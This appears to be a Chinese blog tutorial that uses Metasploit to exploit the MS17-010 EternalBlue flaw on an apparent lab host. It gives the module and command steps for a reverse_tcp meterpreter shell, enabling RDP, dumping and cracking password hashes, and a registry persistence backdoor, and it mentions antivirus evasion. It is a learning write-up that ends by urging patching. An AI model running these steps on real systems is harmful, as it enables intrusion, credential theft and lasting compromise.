一、简介

ms17-010漏洞即永恒之蓝漏洞,是微软在smb服务上的一大漏洞。此漏洞危害极大,曾经使得上百万个公网文件服务器都面临着黑客的勒索攻击,系统全部瘫痪。

metasploit framework是一个提供给安全渗透人员的工具,可以利用自动化的脚本和服务进行渗透测试。今天,我们就从永恒之蓝漏洞入手,学习metasploit的相关使用方法。

二、搭建kali运行环境

这个不是重点,我们一带而过。

1.进入官网下载

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

image-20230611152205338.png

2.安装到虚拟机

image-20230611152245130.png

三、基础知识

首先输入msfconsole打开控制台

image-20230611152443477.png
我们首先需要了解msf的相关基础知识

msf提供了很多module为我们实施自动化的渗透测试,其中分为exploit、auxiliary、post三个部分

exploit是直接的漏洞利用,最终目的是获取到meterpreter——一个后渗透的shell。

auxiliary是辅助模块,可以帮我们发现漏洞、扫描端口等。

post中有大量的后渗透模块,例如利用已经获取的meterpreter开启远程桌面连接、生成持续性后门等。

meterpreter是一个后渗透的shell,我们进行msf框架下的渗透的一切目的就是为了获取到meterpreter。

meterpreter的权限是有限制的,所以我们常常会用到post里的模块利用系统漏洞进行提权。这里面常用的模块就是绕过uac用户控制系统。

payload是攻击载荷,是进行漏洞攻击后要执行的一组指令,这种指令往往能够帮助我们获得meterpreter。我们也会用反弹shell等方法来获取meterpreter——也就是木马植入,这个反弹shell本身就是一种payload。shellcode是一组机器指令,往往作为payload被执行。

encoder包含一系列的编码措施,其中最为有效的通常是shikata,这是为了木马不被杀毒软件查杀或者避免出现一些字符而准备的。

然而随着杀毒软件的不断更新,对病毒程序进行编码已经逃不过杀毒程序的法眼,于是msf为我们提供了evasion模块进行病毒软件的反杀。

当我们需要查找相应模块时,可以使用search查找,然后用use进入到该模块。

进入到该模块后,我们要用show options来设置相应的参数。

例如 set payload windows/meterpreter/reverse_tcp

四、实践

1、扫描漏洞

我们首先查找相应模块

image-20230611153421415.png

我们用第三个进行扫描。
image-20230611153524172.png

可以看到,这里需要我们设置rhost的参数。它已经提前帮我们将payload设置好了。

我们设置一下目标主机的参数,然后run。

image-20230621215505073.png

可以看到,这台机器是十分容易被攻击的。我们现在调用exlpoit的相关模块进行攻击。

2、利用漏洞
use exploit/windows/smb/ms17_010_eternalblue

这里面它已经给我们设置了默认的payload,也就是reverse_tcp反向链接。

查看一下参数的配置

image-20230621220531007.png

设置目标IP,run。

image-20230621215701794.png

在此时,我们就获得了对方机器的meterpreter。这时,我们就获取了系统的meterpreter。

我们查看一下此时的权限

image-20230621215701794.png

可以看到,此时我们已经获得了系统的最高权限,这就是永恒之蓝漏洞的可怕之处。

在获取权限后首先做的事情就是开启对方的远程桌面连接,这里我们使用post模块来实现。

3、后渗透阶段

我们先来看一下系统信息

image-20230621221307462.png

1、进入对方的cmd

输入shell即可进入cmd,这是是乱码,要先通过chcp 65001转换,

image-20230621215750787.png

2、开启远程桌面连接

首先我们查看一下开放的端口

netstat -ano

image-20230621220207446.png

我们发现,对方机器的3389端口是没有打开的。此时,我们可以通过post中的模块来实现。

首先查找一下enable rdp的相关模块

image-20230621220931572.png

复制路径,run一下。

run post/windows/manage/enable_rdp

image-20230621220842850.png

3.、获取对方的密码哈希值

我们输入hashdump获取密码哈希值

image-20230621221522413.png

随便打开一个网站对其进行破解

image-20230621221545655.png

可以看到,hanran的密码就被我们得到了。

4、生成持续性后门

我们利用persistence模块来在注册表中生成可持续性后门

run persistence -A -U -i 5 -p 444 -r ip

具体就不截图了,这个极易被杀软拦截,没有什么使用价值。以后我们会详细讨论免杀技术和持续性后门。

五、总结

我们通过这次对ms17-010漏洞的利用大概理解了使用msf进行渗透攻击的基本流程,对msf基础知识有了一定的了解,对于meterpreter的使用有了一定的认识。我们通过这次渗透测试,可以得出两个收获:

1、及时安装微软发布的官方补丁是十分必要的,安装杀毒软件是十分必要的。

2、msf是一个非常方便、非常强大的工具。只有经过不断地学习和探索,才能将工具用好,而不是只当一个简单的脚本小子。

今天我们的渗透测试记录就到这里。

标签: none

添加新评论